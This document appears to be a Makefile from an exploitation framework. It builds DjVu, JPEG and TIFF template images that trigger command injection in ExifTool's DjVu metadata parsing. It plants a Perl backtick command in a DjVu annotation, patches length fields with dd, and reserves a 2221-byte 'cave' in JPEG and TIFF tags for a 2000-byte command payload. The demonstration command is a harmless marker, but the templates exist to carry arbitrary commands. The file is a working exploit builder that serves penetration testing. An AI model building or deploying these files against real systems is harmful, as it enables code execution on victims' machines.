# Phony declarations, split by role. The three image targets are phony too,
# so Make re-runs their recipes (including the download) on every invocation,
# even when the files already exist.
.PHONY: all clean
.PHONY: msf.djvu msf.jpg msf.tif

# Default goal: build every template image.
all: msf.djvu msf.jpg msf.tif
# Remove the generated images. $(RM) is Make's predefined `rm -f`.
clean:
	$(RM) msf.djvu msf.jpg msf.tif
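# Build msf.djvu: fetch ExifTool's DjVu test image at a pinned commit, run the
# set_author.dsed script over it with djvused, then rewrite the annotation
# chunk in place. The embedded command is a marker only
# (`echo vulnerable > /dev/tty`).
# set_author.dsed is read by djvused, so it is declared as a prerequisite: a
# missing script now stops the build before anything is downloaded.
msf.djvu: set_author.dsed
# -f makes curl exit non-zero on an HTTP error instead of saving the error page
# as the image. The URL pins a commit, but the download is not checksummed.
	curl -fL https://github.com/exiftool/exiftool/raw/ca8685788f5763c547349f239764bd19cf1952da/t/images/DjVu.djvu -o $@
	djvused -f set_author.dsed -s $@
# Rewrite the ANT section as uncompressed data with an 'echo vulnerable' payload
	perl -0777 -pi -e 's!DJVIANTz.*!DJVIANTa\x00\x00\x00\x39(metadata (Author "\\c\@{[`echo vulnerable > /dev/tty`]}"))!s;' $@
# Fix up some length fields. The offsets (8 and 174) and the values written are
# literals, presumably tied to the pinned input file and the text written by
# the step above -- confirm before changing either.
	perl -e 'print "\x00\x00\x00\xeb"' | dd of=$@ bs=1 seek=8 count=4 conv=notrunc
	perl -e 'print "\x00\x00\x00\x45"' | dd of=$@ bs=1 seek=174 count=4 conv=notrunc
# Test the file: a non-zero exit from djvudump fails the recipe.
	djvudump $@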
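# Build msf.jpg: fetch ExifTool's Writer.jpg test image at a pinned commit,
# strip its metadata, add one large filler tag, then change that tag's ID.
msf.jpg:
# -f makes curl exit non-zero on an HTTP error instead of saving the error page
# as the image. The URL pins a commit, but the download is not checksummed.
	curl -fL https://github.com/exiftool/exiftool/raw/a2500333f845b303b86013110651d219e193d3eb/t/images/Writer.jpg -o $@
# Scrub the file
	exiftool -overwrite_original -all= $@
# Create a cave big enough for the djvu template plus a 2000 byte CMD payload
# (2221 'z' bytes written to the Processing Software tag; $$ passes the command
# substitution through to the shell).
	exiftool -overwrite_original -processingsoftware=$$(perl -e 'print "z"x2221') $@
# Change the 'Processing Software' field to a HasselbladExif field
# NOTE(review): -i without a suffix and \x escapes are GNU sed behaviour, and
# without the g flag sed replaces the first match in each newline-delimited
# record. The step presumably relies on the scrubbed file holding this byte
# pair only at the intended tag -- confirm on the build platform.
	sed -i 's/\x00\x0b/\xc5\x1b/' $@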
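# Build msf.tif: fetch ExifTool's ExifTool.tif test image at a pinned commit,
# strip its metadata (plus a second pass over named IFD0 fields), add one
# large filler tag, then change that tag's ID.
msf.tif:
# -f makes curl exit non-zero on an HTTP error instead of saving the error page
# as the image. The URL pins a commit, but the download is not checksummed.
	curl -fL https://github.com/exiftool/exiftool/raw/a2500333f845b303b86013110651d219e193d3eb/t/images/ExifTool.tif -o $@
# Scrub the file
	exiftool -overwrite_original -all= $@
# Selectively scrub IFD0 fields
	exiftool -overwrite_original -ImageDescription= -Make= -Model= -Software= -ModifyDate= $@
# Create a cave big enough for the djvu template plus a 2000 byte CMD payload
# (2221 'z' bytes written to the Processing Software tag; $$ passes the command
# substitution through to the shell).
	exiftool -overwrite_original -processingsoftware=$$(perl -e 'print "z"x2221') $@
# Change the 'Processing Software' field to a HasselbladExif field
# NOTE(review): -i without a suffix and \x escapes are GNU sed behaviour, and
# without the g flag sed replaces the first match in each newline-delimited
# record. The step presumably relies on the scrubbed file holding this byte
# pair only at the intended tag -- confirm on the build platform.
	sed -i 's/\x00\x0b/\xc5\x1b/' $@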